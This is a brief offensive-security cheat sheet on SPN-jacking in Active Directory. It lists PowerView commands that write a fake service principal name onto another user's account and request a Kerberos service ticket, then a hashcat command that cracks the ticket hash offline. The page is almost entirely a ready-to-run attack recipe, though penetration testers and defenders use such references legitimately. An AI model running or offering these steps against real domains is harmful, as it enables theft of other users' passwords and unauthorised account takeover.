SPN-Jacking
Exploit
1. Set SPN and Get the Hash of the Service Ticket
# 1. Import PowerView module
. .\PowerView.ps1
# 2. Set SPN
Set-DomainObject -Identity <OTHER_USER> -SET @{serviceprincipalname='evil/evil'}
# 3. Request sercice ticket
Get-DomainSPNTicket -SPN evil/evil2. Crack the Hash
# -m 13100: Replace it with the appropriate number depending on the algorithm.
hashcat -a 0 -m 13100 hash.txt wordlist.txtReferences
Last updated